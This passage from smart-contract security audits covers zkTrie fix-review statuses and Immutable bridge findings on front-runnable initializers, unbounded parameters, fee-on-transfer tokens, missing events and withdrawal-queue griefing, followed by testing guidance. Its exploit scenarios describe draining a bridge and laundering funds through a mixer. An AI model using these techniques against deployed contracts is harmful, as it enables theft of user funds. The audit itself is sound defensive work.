{ n, err := rand.Int(rand.Reader, big.NewInt(2)) assert.NoError(t, err) return (n.Cmp(big.NewInt(1)) == 0) } func hex_to_bytes(t *testing.T, hex_str string) []byte { key, err := hex.DecodeString(hex_str) assert.NoError(t, err) return key } func bytes_to_byte32(b []byte) []zkt.Byte32 { if len(b)%32 != 0 { panic("unaligned arrays are unsupported") } l := len(b) / 32 out := make([]zkt.Byte32, l) i := 0 for i < l { copy(out[i][:], b[i*32:(i+1)*32]) i += 1 } return out } // Tests that an inclusion proof for a given key can be generated and verified.
func verify_inclusion(t *testing.T, zkTrie *ZkTrie, key []byte) { lvl := 100 secureKey, err := zkt.ToSecureKey(key) assert.NoError(t, err) proof, node, err := BuildZkTrieProof(zkTrie.tree.rootHash, secureKey, lvl, zkTrie.tree.GetNode) assert.NoError(t, err) valid := VerifyProofZkTrie(zkTrie.tree.rootHash, proof, node) assert.True(t, valid) hash, err := proof.Verify(node.nodeHash, node.NodeKey) assert.NoError(t, err) assert.NotNil(t, hash) } // Tests that a non-inclusion proof for a given key can be generated and verified. func verify_noninclusion(t *testing.T, zkTrie *ZkTrie, key []byte) { lvl := 100 secureKey, err := zkt.ToSecureKey(key) assert.NoError(t, err) proof, node, err := BuildZkTrieProof(zkTrie.tree.rootHash, secureKey, lvl, zkTrie.tree.GetNode) assert.NoError(t, err) valid := VerifyProofZkTrie(zkTrie.tree.rootHash, proof, node) assert.False(t, valid) hash, err := proof.Verify(node.nodeHash, node.NodeKey) assert.Error(t, err) assert.Nil(t, hash) } // Verifies that adding elements from the trie works. func set(t *testing.T, zkTrie *ZkTrie, idealTrie IdealTrie, key_hex string, data_hex string) { vFlag := uint32(1) key := hex_to_bytes(t, key_hex) data := hex_to_bytes(t, data_hex) err := zkTrie.TryUpdate(key, vFlag, bytes_to_byte32(data)) assert.NoError(t, err) idealTrie[key_hex] = data verify_inclusion(t, zkTrie, key) } // Verifies that retrieving elements from the trie works. func get(t *testing.T, zkTrie *ZkTrie, idealTrie IdealTrie, key_hex string) { key := hex_to_bytes(t, key_hex) ideal_data, ok := idealTrie[key_hex] if ok { trie_data, err := zkTrie.TryGet(key) assert.NoError(t, err) assert.True(t, reflect.DeepEqual(trie_data, ideal_data)) verify_inclusion(t, zkTrie, key) } else { _, err := zkTrie.TryGet(key) assert.Equal(t, ErrKeyNotFound, err) verify_noninclusion(t, zkTrie, key) } } // Verifies that removing elements from the trie works. func remove(t *testing.T, zkTrie *ZkTrie, idealTrie IdealTrie, key_hex string) { key := hex_to_bytes(t, key_hex) _, ok := idealTrie[key_hex] if ok { delete(idealTrie, key_hex) err := zkTrie.TryDelete(key) assert.NoError(t, err) } else { _, err := zkTrie.TryGet(key) assert.Equal(t, ErrKeyNotFound, err) } verify_noninclusion(t, zkTrie, key) } Figure F.2: Helper functions for TestZkTrie_BasicRandomTest (trie/zk_trie_test.go) G. Fix Review Results When undertaking a fix review, Trail of Bits reviews the fixes implemented for issues identified in the original report. This work involves a review of specific areas of the source code and system configuration, not comprehensive analysis of the system. On September 13, 2023, Trail of Bits reviewed the fixes and mitigations implemented by the Scroll team for the issues identified in this report. We reviewed each fix to determine its effectiveness in resolving the associated issue. Trail of Bits received fix PRs for findings TOB-ZKTRIE-1, TOB-ZKTRIE-4, TOB-ZKTRIE-5, TOB-ZKTRIE-16, TOB-ZKTRIE-18, and TOB-ZKTRIE-19. Scroll did not provide fix PRs for the medium-severity findings TOB-ZKTRIE-2, TOB-ZKTRIE-10, and TOB-ZKTRIE-12; the low-severity finding TOB-ZKTRIE-11; or the remaining findings, all of which are of informational severity. In summary, of the 19 issues described in this report, Scroll has resolved five issues and has partially resolved one issue. No fix PRs were provided for the remaining 13 issues, so their fix statuses are undetermined. For additional information, please see the Detailed Fix Review Results below.
ID Title Status
1 Lack of domain separation allows proof forgery Resolved
2 Lack of proof validation causes denial of service on the verifier Undetermined
3 Two incompatible ways to generate proofs Undetermined
4 BuildZkTrieProof does not populate NodeAux.Value Resolved
5 Leaf nodes with different values may have the same hash Resolved
6 Empty UpdatePreimage function body Undetermined
7 CanonicalValue is not canonical Undetermined
8 ToSecureKey and ToSecureKeyBytes implicitly truncate the key Undetermined
9 Unused key argument on the bridge_prove_write function Undetermined
10 The PreHandlingElems function panics with an empty elems array Undetermined
11 The hash_external function panics with integers larger than 32 bytes Undetermined
12 Mishandling of cgo.Handles causes runtime errors Undetermined
13 Unnecessary unsafe pointer manipulation in Node.Data() Undetermined
14 NewNodeFromBytes does not fully validate its input Undetermined
15 init_hash_scheme is not thread-safe Undetermined
16 Safe-Rust ZkMemoryDb interface is not thread-safe Resolved
17 Some Node functions return the zero hash instead of errors Undetermined
18 get_account can read past the buffer Partially Resolved
19 Unchecked usize to c_int casts allow hash collisions by length misinterpretation Resolved
Detailed Fix Review Results TOB-ZKTRIE-1: Lack of domain separation allows proof forgery Resolved in PR #11. Domain separation is now performed between leaves, Byte32 values, and several different types of internal branches. Additionally, sequence-length domain separation has been added to HashElems as part of the fixes for finding TOB-ZKTRIE-5. HashElemsWithDomain does not add its own domain separation and is potentially error-prone. It appears to be used correctly, but the Scroll team should consider making HashElemsWithDomain private to prevent misuse. TOB-ZKTRIE-2: Lack of proof validation causes denial of service on the verifier Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-3: Two incompatible ways to generate proofs Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-4: BuildZkTrieProof does not populate NodeAux.Value Resolved in PR #11. The BuildZkTrieProof function now calls ValueHash, which populates NodeAux. TOB-ZKTRIE-5: Leaf nodes with different values may have the same hash Resolved in PR #11. NodeHash now uses HandlingElemsAndByte32, which calls HashElems, which adds domain separation based on the length of its input to recursive calls in the internal Merkle tree structure. TOB-ZKTRIE-6: Empty UpdatePreimage function body Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-7: CanonicalValue is not canonical Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-8: ToSecureKey and ToSecureKeyBytes implicitly truncate the key Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-9: Unused key argument on the bridge_prove_write function Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-10: The PreHandlingElems function panics with an empty elems array Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-11: The hash_external function panics with integers larger than 32 bytes Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-12: Mishandling of cgo.Handles causes runtime errors Undetermined.
No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-13: Unnecessary unsafe pointer manipulation in Node.Data() Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-14: NewNodeFromBytes does not fully validate its input Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-15: init_hash_scheme is not thread-safe Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-16: Safe-Rust ZkMemoryDb interface is not thread-safe Resolved in PR #12. The use of the non-thread-safe function Database.Init was replaced with Put, which is thread-safe. The Scroll team should consider adding cautionary documentation to Init to prevent its misuse in the future. TOB-ZKTRIE-17: Some Node functions return the zero hash instead of errors Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-18: get_account can read past the buffer Partially resolved in PR #13. The get_account function now verifies the slice length. However, the function may still misbehave on platforms where Go’s int type is 32 bits and if it is given a value above 2^31, which may cause the cast to overflow. This seems extremely unlikely to cause problems in practice. However, adding assert calls to ZkTrie::get and TrieGetSize to restrict the size to be below a reasonable upper bound such as 2^30 would prevent this issue entirely by causing the program to terminate if the affected code is misused on a problematic platform. TOB-ZKTRIE-19: Unchecked usize to c_int casts allow hash collisions by length misinterpretation Resolved in PR #14. This implementation will now crash instead of triggering a bug. The Scroll team should watch for possible denials of service when deploying the software. H. Fix Review Status Categories The following table describes the statuses used to indicate whether an issue has been sufficiently addressed.
Fix Status
Undetermined: The status of the issue was not determined during this engagement.
Unresolved: The issue persists and has not been resolved.
Partially Resolved: The issue persists but has been partially resolved.
Resolved: The issue has been sufficiently resolved.
diff --git a/findings_newupdate/tob/2023-08-immutable-securityreview.txt b/findings_newupdate/tob/2023-08-immutable-securityreview.txt new file mode 100644 index 0000000..e44ecda --- /dev/null +++ b/findings_newupdate/tob/2023-08-immutable-securityreview.txt @@ -0,0 +1,9 @@ +1. Initialization functions vulnerable to front-running Severity: Informational Difficulty: High Type: Timing Finding ID: TOB-IMM-1 Target: Throughout Description Several implementation contracts have initialization functions that can be front-run, which would allow an attacker to incorrectly initialize the contracts.
Due to the use of the delegatecall proxy pattern, the RootERC20Predicate and RootERC20PredicateFlowRate contracts (as well as other upgradeable contracts that are not in scope) cannot be initialized with a constructor, so they have initialize functions: function initialize ( address newStateSender , address newExitHelper , address newChildERC20Predicate , address newChildTokenTemplate , address nativeTokenRootAddress ) external virtual initializer { __RootERC20Predicate_init( newStateSender, newExitHelper, newChildERC20Predicate, newChildTokenTemplate, nativeTokenRootAddress ); } Figure 1.1: Front-runnable initialize function ( RootERC20Predicate.sol ) function initialize ( address superAdmin , address pauseAdmin , address unpauseAdmin , address rateAdmin , address newStateSender , address newExitHelper , address newChildERC20Predicate , address newChildTokenTemplate , address nativeTokenRootAddress ) external initializer { __RootERC20Predicate_init( newStateSender, newExitHelper, newChildERC20Predicate, newChildTokenTemplate, nativeTokenRootAddress ); __Pausable_init(); __FlowRateWithdrawalQueue_init(); _setupRole(DEFAULT_ADMIN_ROLE, superAdmin); _setupRole(PAUSER_ADMIN_ROLE, pauseAdmin); _setupRole(UNPAUSER_ADMIN_ROLE, unpauseAdmin); _setupRole(RATE_CONTROL_ROLE, rateAdmin); } Figure 1.2: Front-runnable initialize function ( RootERC20PredicateFlowRate.sol ) An attacker could front-run these functions and initialize the contracts with malicious values. The documentation provided by the Immutable team indicates that they are aware of this issue and how to mitigate it upon deployment of the proxy or when upgrading the implementation. However, there do not appear to be any deployment scripts to demonstrate that this will be correctly done in practice, and the codebase’s tests do not cover upgradeability. Exploit Scenario Bob deploys the RootERC20Predicate contract. Eve deploys an upgradeable version of the ExitHelper contract and front-runs the RootERC20Predicate initialization, passing her contract’s address as the exitHelper argument. Due to a lack of post-deployment checks, this issue goes unnoticed and the protocol functions as intended for some time, drawing in a large amount of deposits. Eve then upgrades the ExitHelper contract to allow her to arbitrarily call the onL2StateReceive function of the RootERC20Predicate contract, draining all assets from the bridge. Recommendations Short term, either use a factory pattern that will prevent front-running the initialization, or ensure that the deployment scripts have robust protections against front-running attacks. Long term, carefully review the Solidity documentation , especially the “Warnings” section, and the pitfalls of using the delegatecall proxy pattern. +2. Lack of lower and upper bounds for system parameters Severity: Informational Difficulty: High Type: Data Validation Finding ID: TOB-IMM-2 Target: contracts/root/flowrate/RootERC20PredicateFlowRate.sol Description The lack of lower and upper bound checks when setting important system parameters could lead to a temporary denial of service, allow users to complete their withdrawals prematurely, or otherwise hinder the expected performance of the system. The setWithdrawalDelay function of the RootERC20PredicateFlowRate contract can be used by the rate control role to set the amount of time that a user needs to wait before they can withdraw their assets from the root chain of the bridge. 
// RootERC20PredicateFlowRate.sol function setWithdrawalDelay ( uint256 delay ) external onlyRole(RATE_CONTROL_ROLE) { _setWithdrawalDelay(delay); } // FlowRateWithdrawalQueue.sol function _setWithdrawalDelay ( uint256 delay ) internal { withdrawalDelay = delay; emit WithdrawalDelayUpdated(delay); } Figure 2.1: The setter functions for the withdrawalDelay state variable ( RootERC20PredicateFlowRate.sol and FlowRateWithdrawalQueue.sol ) The withdrawalDelay variable value is applied to all currently pending withdrawals in the system, as shown in the highlighted lines of figure 2.2. function _processWithdrawal ( address receiver , uint256 index ) internal returns ( address withdrawer , address token , uint256 amount ) { // ... // Note: Add the withdrawal delay here, and not when enqueuing to allow changes // to withdrawal delay to have effect on in progress withdrawals. uint256 withdrawalTime = withdrawal.timestamp + withdrawalDelay; // slither-disable-next-line timestamp if ( block.timestamp < withdrawalTime) { // solhint-disable-next-line not-rely-on-time revert WithdrawalRequestTooEarly( block.timestamp , withdrawalTime); } // ... } Figure 2.2: The function completes a withdrawal from the withdrawal queue if the withdrawalTime has passed. ( FlowRateWithdrawalQueue.sol ) However, the setWithdrawalDelay function does not perform any validation on the delay input parameter. If the input parameter is set to zero, users can skip the withdrawal queue and immediately withdraw their assets. Conversely, if this variable is set to a very high value, it could prevent users from withdrawing their assets for as long as the variable is not updated. The setRateControlThreshold function allows the rate control role to set important token parameters that are used to limit the amount of tokens that can be withdrawn at once, or in a certain time period, in order to mitigate the risk of a large amount of tokens being bridged after an exploit. // RootERC20PredicateFlowRate.sol function setRateControlThreshold ( address token , uint256 capacity , uint256 refillRate , uint256 largeTransferThreshold ) external onlyRole(RATE_CONTROL_ROLE) { _setFlowRateThreshold(token, capacity, refillRate); largeTransferThresholds[token] = largeTransferThreshold; } // FlowRateDetection.sol function _setFlowRateThreshold ( address token , uint256 capacity , uint256 refillRate ) internal { if (token == address ( 0 )) { revert InvalidToken(); } if (capacity == 0 ) { revert InvalidCapacity(); } if (refillRate == 0 ) { revert InvalidRefillRate(); } Bucket storage bucket = flowRateBuckets[token]; if (bucket.capacity == 0 ) { bucket.depth = capacity; } bucket.capacity = capacity; bucket.refillRate = refillRate; } Figure 2.3: The function sets the system parameters to limit withdrawals of a specific token. ( RootERC20PredicateFlowRate.sol and FlowRateDetection.sol ) However, because the _setFlowRateThreshold function of the FlowRateDetection contract is missing upper bounds on the input parameters, these values could be set to an incorrect or very high value. This could potentially allow users to withdraw large amounts of tokens at once, without triggering the withdrawal queue. Exploit Scenario Alice attempts to update the withdrawalDelay state variable from 24 to 48 hours. However, she mistakenly sets the variable to 0. Eve uses this setting to skip the withdrawal queue and immediately withdraws her assets.
Recommendations Short term, determine reasonable lower and upper bounds for the setWithdrawalDelay and setRateControlThreshold functions, and add the necessary validation to those functions. Long term, carefully document which system parameters are configurable and ensure they have adequate upper and lower bound checks. +3. RootERC20Predicate is incompatible with nonstandard ERC-20 tokens Severity: Low Difficulty: Low Type: Data Validation Finding ID: TOB-IMM-3 Target: contracts/root/RootERC20Predicate.sol Description The deposit and depositTo functions of the RootERC20Predicate contract are incompatible with nonstandard ERC-20 tokens, such as tokens that take a fee on transfer. The RootERC20Predicate contract allows users to deposit arbitrary tokens into the root chain of the bridge and mint the corresponding token on the child chain of the bridge. Users can deposit their tokens by approving the bridge for the required amount and then calling the deposit or depositTo function of the contract. These functions will call the internal _depositERC20 function, which will perform a check to ensure the token balance of the contract is exactly equal to the balance of the contract before the deposit, plus the amount of tokens that are being deposited. function _depositERC20 (IERC20Metadata rootToken, address receiver , uint256 amount ) private { uint256 expectedBalance = rootToken.balanceOf( address ( this )) + amount; _deposit(rootToken, receiver, amount); // invariant check to ensure that the root token balance has increased by the amount deposited // slither-disable-next-line incorrect-equality require ((rootToken.balanceOf( address ( this )) == expectedBalance), "RootERC20Predicate: UNEXPECTED_BALANCE" ); } Figure 3.1: Internal function used to deposit ERC-20 tokens to the bridge ( RootERC20Predicate.sol ) However, some nonstandard ERC-20 tokens will take a percentage of the transferred amount as a fee. Due to this, the require statement highlighted in figure 3.1 will always fail, preventing users from depositing such tokens. Recommendations Short term, clearly document that nonstandard ERC-20 tokens are not supported by the protocol. If the team determines that they want to support nonstandard ERC-20 implementations, additional logic should be added into the _deposit function to determine the actual token amount received by the contract. In this case, reentrancy protection may be needed to mitigate the risks of ERC-777 and similar tokens that implement callbacks whenever tokens are sent or received. Long term, be aware of the idiosyncrasies of ERC-20 implementations. This standard has a history of misuses and issues. References ● Incident with non-standard ERC20 deflationary tokens ● d-xo/weird-erc20
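If the team does decide to support such tokens, the short-term recommendation above amounts to crediting the balance delta rather than the caller-supplied amount; a minimal sketch, assuming OpenZeppelin's SafeERC20 and ReentrancyGuard are available, and restructured so the transfer happens before the amount is recorded (this is not the codebase's actual _deposit flow):

using SafeERC20 for IERC20Metadata;

function _depositERC20(IERC20Metadata rootToken, address receiver, uint256 amount) private nonReentrant {
    uint256 balanceBefore = rootToken.balanceOf(address(this));
    rootToken.safeTransferFrom(msg.sender, address(this), amount);
    // Credit what actually arrived, which can be less than `amount` for
    // fee-on-transfer tokens.
    uint256 received = rootToken.balanceOf(address(this)) - balanceBefore;
    _deposit(rootToken, receiver, received);
}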
+4. Lack of event generation Severity: Informational Difficulty: Low Type: Auditing and Logging Finding ID: TOB-IMM-4 Target: RootERC20PredicateFlowRate.sol , ImmutableSeaport.sol Description Multiple critical operations do not emit events. This creates uncertainty among users interacting with the system. The setRateControlThreshold function in the RootERC20PredicateFlowRate contract does not emit an event when it updates the largeTransferThresholds critical storage variable for a token (figure 4.1). However, having an event emitted to reflect such a change in the critical storage variable may allow other system and off-chain components to detect suspicious behavior in the system. Events generated during contract execution aid in monitoring, baselining behavior, and detecting suspicious activity. Without events, users and blockchain-monitoring systems cannot easily detect behavior that falls outside the baseline conditions, and malfunctioning contracts and attacks could go undetected. function setRateControlThreshold ( address token , uint256 capacity , uint256 refillRate , uint256 largeTransferThreshold ) external onlyRole(RATE_CONTROL_ROLE) { _setFlowRateThreshold(token, capacity, refillRate); largeTransferThresholds[token] = largeTransferThreshold; } Figure 4.1: The setRateControlThreshold function ( RootERC20PredicateFlowRate.sol #L214-L222 ) In addition to the above function, the following function should also emit events: ● The setAllowedZone function in seaport/contracts/ImmutableSeaport.sol Recommendations Short term, add events for all functions that change state to aid in better monitoring and alerting. Long term, ensure that all state-changing operations are always accompanied by events. In addition, use static analysis tools such as Slither to help prevent such issues in the future.
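As an illustration of the short-term recommendation, the threshold update could emit a dedicated event after the state change; the event name and shape below are illustrative, not from the codebase:

event LargeTransferThresholdUpdated(address indexed token, uint256 threshold); // illustrative event

function setRateControlThreshold(
    address token,
    uint256 capacity,
    uint256 refillRate,
    uint256 largeTransferThreshold
) external onlyRole(RATE_CONTROL_ROLE) {
    _setFlowRateThreshold(token, capacity, refillRate);
    largeTransferThresholds[token] = largeTransferThreshold;
    // Emitted after the state change so off-chain monitoring can baseline updates.
    emit LargeTransferThresholdUpdated(token, largeTransferThreshold);
}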
+5. Withdrawal queue can be forcibly activated to hinder bridge operation Severity: Medium Difficulty: Low Type: Denial of Service Finding ID: TOB-IMM-5 Target: RootERC20PredicateFlowRate.sol Description The withdrawal queue can be forcibly activated to impede the proper operation of the bridge. The RootERC20PredicateFlowRate contract implements a withdrawal queue to more easily detect and stop large withdrawals from passing through the bridge (e.g., bridging illegitimate funds from an exploit). A transaction can enter the withdrawal queue in four ways: 1. If a token’s flow rate has not been configured by the rate control admin 2. If the withdrawal amount is larger than or equal to the large transfer threshold for that token 3. If, during a predefined period, the total withdrawals of that token are larger than the defined token capacity 4. If the rate controller manually activates the withdrawal queue by using the activateWithdrawalQueue function
In cases 3 and 4 above, the withdrawal queue becomes active for all tokens, not just the individual transfers. Once the withdrawal queue is active, all withdrawals from the bridge must wait a specified time before the withdrawal can be finalized. As a result, a malicious actor could withdraw a large amount of tokens to forcibly activate the withdrawal queue and hinder the expected operation of the bridge. Exploit Scenario 1 Eve observes Alice initiating a transfer to bridge her tokens back to the mainnet. Eve also initiates a transfer, or a series of transfers to avoid exceeding the per-transaction limit, of sufficient tokens to exceed the expected flow rate. With Alice unaware she is being targeted for griefing, Eve can execute her withdrawal on the root chain first, cause Alice’s withdrawal to be pushed into the withdrawal queue, and activate the queue for every other bridge user. Exploit Scenario 2 Mallory has identified an exploit on the child chain or in the bridge itself, but because of the withdrawal queue, it is not feasible to exfiltrate the funds quickly enough without risking getting caught. Mallory identifies tokens with small flow rate limits relative to their price and repeatedly triggers the withdrawal queue for the bridge, degrading the user experience until Immutable disables the withdrawal queue. Mallory takes advantage of this window of time to carry out her exploit, bridge the funds, and move them into a mixer. Recommendations Short term, explore the feasibility of withdrawal queues on a per-token basis instead of having only a global queue. Be aware that if the flow rates are set low enough, an attacker could feasibly use them to grief all bridge users. Long term, develop processes for regularly reviewing the configuration of the various token buckets. Fluctuating token values may unexpectedly make this type of griefing more feasible. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document. Vulnerability Categories Category Description Access Controls Insufficient authorization or assessment of rights Auditing and Logging Insufficient auditing of actions or logging of problems Authentication Improper identification of users Configuration Misconfigured servers, devices, or software components Cryptography A breach of system confidentiality or integrity Data Exposure Exposure of sensitive information Data Validation Improper reliance on the structure or values of data Denial of Service A system failure with an availability impact Error Reporting Insecure or insufficient reporting of error conditions Patching Use of an outdated software package or library Session Management Improper identification of authenticated users Testing Insufficient test methodology or test coverage Timing Race conditions or other order-of-operations flaws Undefined Behavior Undefined behavior triggered within the system Severity Levels Severity Description Informational The issue does not pose an immediate risk but is relevant to security best practices. Undetermined The extent of the risk was not determined during this engagement. Low The risk is small or is not one the client has indicated is important. Medium User information is at risk; exploitation could pose reputational, legal, or moderate financial risks.
High The flaw could affect numerous users and have serious reputational, legal, or financial implications. Difficulty Levels Difficulty Description Undetermined The difficulty of exploitation was not determined during this engagement. Low The flaw is well known; public tools for its exploitation exist or can be scripted. Medium An attacker must write an exploit or will need in-depth knowledge of the system. High An attacker must have privileged access to the system, may need to know complex technical details, or must discover other weaknesses to exploit this issue. B. Code Maturity Categories The following tables describe the code maturity categories and rating criteria used in this document. Code Maturity Categories Category Description Arithmetic The proper use of mathematical operations and semantics Auditing The use of event auditing and logging to support monitoring Authentication / Access Controls The use of robust access controls to handle identification and authorization and to ensure safe interactions with the system Complexity Management The presence of clear structures designed to manage system complexity, including the separation of system logic into clearly defined functions Cryptography and Key Management The safe use of cryptographic primitives and functions, along with the presence of robust mechanisms for key generation and distribution Decentralization The presence of a decentralized governance structure for mitigating insider threats and managing risks posed by contract upgrades Documentation The presence of comprehensive and readable codebase documentation Front-Running Resistance The system’s resistance to front-running attacks Low-Level Manipulation The justified use of inline assembly and low-level calls Testing and Verification The presence of robust testing procedures (e.g., unit tests, integration tests, and verification methods) and sufficient test coverage Rating Criteria Rating Description Strong No issues were found, and the system exceeds industry standards. Satisfactory Minor issues were found, but the system is compliant with best practices. Moderate Some issues that may affect system safety were found. Weak Many issues that affect system safety were found. Missing A required component is missing, significantly affecting system safety. Not Applicable The category is not applicable to this review. Not Considered The category was not considered in this review. Further Investigation Required Further investigation is required to reach a meaningful conclusion. C. Code Quality Recommendations The following recommendations are not associated with specific vulnerabilities. However, they enhance code readability and may prevent the introduction of vulnerabilities in the future. Bridge Contracts ● The _setupRole function was deprecated in OpenZeppelin Contracts v4.4.0 in favor of the _grantRole function. Replace the deprecated calls with similar calls to _grantRole . ● Using 0x1 as the root chain token address for native ether could have subtle unexpected side effects because this address corresponds to the ecrecover precompile. Consider using a different address outside of the existing precompile space (e.g., some protocols use an address consisting of all 0xe s). ● Prefer using larger time units when possible to improve readability. For example, the DEFAULT_WITHDRAWAL_DELAY constant in the FlowRateWithdrawalQueue contract could be defined as 1 days instead of 60 * 60 * 24 . ● Assigning constant state variables to be the result of an expression that uses other constant variables can lead to an increase in gas costs, bytecode size, and unexpected results. This is because the compiler will replace all mentions of the constant with the expression itself, as opposed to replacing it with the result of the expression in case of literals. This can cause subtle issues if the expression results in a revert or panic (e.g., arithmetic underflow).
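A small illustration of the last point (the names and values are illustrative):

// Every use of SECONDS_PER_DAY inlines the expression 60 * 60 * 24 into the
// bytecode; the compiler re-evaluates the expression at each use site.
uint256 internal constant SECONDS_PER_DAY = 60 * 60 * 24;

// A time-unit literal is resolved by the compiler to the single value 86400.
uint256 internal constant ONE_DAY = 1 days;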
D. Testing Improvement Recommendations This appendix aims to provide general recommendations on improving processes and creating a robust testing suite. General Recommendations Creating a robust testing suite is an iterative process that can involve defining or adjusting internal development processes and using multiple testing strategies and approaches. We compiled a list of general guidelines for improving testing suite quality below: 1. Define a clear test directory structure. A clear directory structure can be beneficial for structuring the work of multiple developers, making it easier to identify which components and behaviors are being tested and giving insight into the overall test coverage. 2. Write a design specification of the system, its components, and its functions in plain language. Defining a specification can allow the team to more easily detect bugs and inconsistencies in the system, reduce the likelihood that future code changes will introduce bugs, improve the maintainability of the system, and create a robust and holistic testing strategy. 3. Use the function specifications to guide the creation of unit tests. Creating a specification of all preconditions, postconditions, failure cases, entry points, and execution paths for a function will make it easier to maintain high test coverage and identify edge cases. 4. Use the interaction specifications to guide the creation of integration tests. An interaction specification will make it easier to identify the interactions that need to be tested and the external failure cases that need to be validated or guarded against. It will also help identify issues related to access controls and external calls. 5. Use fork testing for integration testing with third-party smart contracts and to ensure the deployed system works as expected. Fork testing can be used to test interactions between the protocol contracts and third-party smart contracts by providing an environment that is as close to production as possible. Additionally, fork testing can be used to identify whether the deployed system is behaving as expected. 6. Implement fuzz testing by first defining a set of system- and function-level invariants and then testing them with Echidna and/or Foundry. Fuzz testing is a powerful technique for exposing security vulnerabilities and finding edge cases that are unlikely to be found through unit testing or manual review. Fuzz testing can be done on a single function by passing in randomized arguments and on an entire system by generating a sequence of random calls to various functions inside the system. Both testing approaches should be applied; see the sketch after this list. 7. Use mutation testing to identify gaps in test coverage and more easily identify bugs in the code. Mutation testing can help identify coverage gaps in unit tests and help discover security vulnerabilities. Taking a two-pronged approach using Necessist to mutate tests and universalmutator to mutate source code can prove valuable in creating a robust testing suite.
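As one concrete shape for the fuzz-testing guideline above (item 6), a Foundry-style property test might look like the following; the DelayConfig contract is a hypothetical stand-in that exists only to make the example self-contained:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

import "forge-std/Test.sol";

// Hypothetical contract with a bounded setter; not from the audited codebase.
contract DelayConfig {
    uint256 public withdrawalDelay;

    function setWithdrawalDelay(uint256 delay) external {
        require(delay >= 1 hours && delay <= 7 days, "delay out of bounds");
        withdrawalDelay = delay;
    }
}

contract DelayConfigFuzzTest is Test {
    DelayConfig internal config;

    function setUp() public {
        config = new DelayConfig();
    }

    // Function-level invariant: any in-bounds delay is accepted and stored.
    function testFuzz_setWithdrawalDelay(uint256 delay) public {
        delay = bound(delay, 1 hours, 7 days);
        config.setWithdrawalDelay(delay);
        assertEq(config.withdrawalDelay(), delay);
    }

    // Negative test: out-of-bounds values must revert.
    function testFuzz_rejectsOutOfBoundsDelay(uint256 delay) public {
        vm.assume(delay < 1 hours || delay > 7 days);
        vm.expectRevert();
        config.setWithdrawalDelay(delay);
    }
}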
Directory Structure Creating a specific directory structure for the system’s tests will make it easier to develop and maintain the testing suite and to find coverage gaps. This section contains brief guidelines on defining a directory structure: ● Create individual directories for each test type (e.g., unit/ , integration/ , fork/ , fuzz/ ) and for the utility contracts. The individual directories can be further divided into directories based on components or behaviors being tested. ● Create a single base contract that inherits from the shared utility contracts and is inherited by individual test contracts. This will help reduce code duplication across the testing suite. ● Create a clear naming convention for test files and test functions to make it easier to filter tests and understand the properties or contracts that are being tested. Specification Guidelines This section provides generally accepted best practices and guidance for how to write design specifications. A good design specification serves three purposes: 1. It helps development teams detect bugs and inconsistencies in a proposed system architecture before any code is written. Codebases written without adequate specifications are often littered with snippets of code that have lost their relevance as the system’s design has evolved. Without a specification, it is exceedingly challenging to detect such code snippets and remove them without extensive validation testing. 2. It reduces the likelihood that bugs will be introduced in implementations of the system. In systems without a specification, engineers must divide their attention between designing the system and implementing it in code. In projects requiring multiple engineers, engineers may make assumptions about how another engineer’s component works, creating an opportunity for bugs to be introduced. 3. It improves the maintainability of system implementations and reduces the likelihood that future code changes will introduce bugs. Without an adequate specification, new developers need to spend time “on-ramping,” where they explore the code and learn how it works. This process is highly error-prone and can lead to incorrect assumptions and the introduction of bugs. Low-level designs may also be used by test engineers to create property-based fuzz tests and by auditors to reduce the time needed to audit a specific protocol component. Specification Construction A good specification must describe system components in enough detail that an engineer unfamiliar with the project can use the specification to implement those components.
The level of detail required to achieve this can vary from project to project, but generally, a low-level specification will include the following details, at a minimum: ● How each system component (e.g., a contract or plugin) interacts with and relies on other components ● The actors and agents that participate in the system, the way they interact with the system, and their permissions, roles, authorization mechanisms, and expected known-good flows ● The expected failure conditions the system may encounter and the way those failures are mitigated, including failures that are automatically mitigated ● Specification details for each function that the system will implement, which should include the following: ○ A description of the function’s purpose and intended use ○ A description of the function’s inputs and the various validations that are performed against each input ○ Any specific restrictions on the function’s inputs that are not validated or not obvious ○ Any interactions between the function and other system components ○ The function’s various failure modes, such as failure modes for queries to a Chainlink oracle for a price (e.g., stale price, oracle disabled) ○ Any authentication or authorization required by the function ○ Any function-level assumptions that depend on other components behaving in a specific way In addition, specifications should use standardized RFC-2119 language as much as possible. This language pushes specification authors toward a writing style that is both detailed and easy to understand. One relevant example is the ERC-4626 specification , which uses RFC-2119 language and provides enough constraints on implementers so that a vault client for a single implementation may be used interchangeably with other implementations. Interaction Specification Example An interaction specification is used to describe how the components of the system depend on each other. It includes a description of the other components that the system interacts with, the nature of those interactions, expected behavior or dependencies, and access relationships. A diagram can often be a helpful aid for modeling component interactions, but it should not be used to substitute a textual description of the component’s interactions. Part of the goal of a specification is to help derive a list of properties that can be explicitly tested, and deriving properties from a diagram is much more challenging and error-prone than deriving properties from a textual specification. Here is an example of an interaction specification. RootERC20Predicate interacts with the following contracts: ● StateSender : RootERC20Predicate calls the syncState function of this contract whenever: 1. a root token is mapped to a child token address, or 2. an ERC-20 or native asset is deposited into the contract. This function will emit an event that will be picked up by the off-chain components and later included as part of a commit to the receiving chain. The following contracts interact with RootERC20Predicate : ● [Example contract] The following actors interact with RootERC20Predicate : ● [Example actor] Function Specification Example Here is an example of a specification for the mapToken(IERC20Metadata rootToken) function. The mapToken function can be called by any account to map the root token address to a child token on the other chain. If the rootToken input parameter is zero, 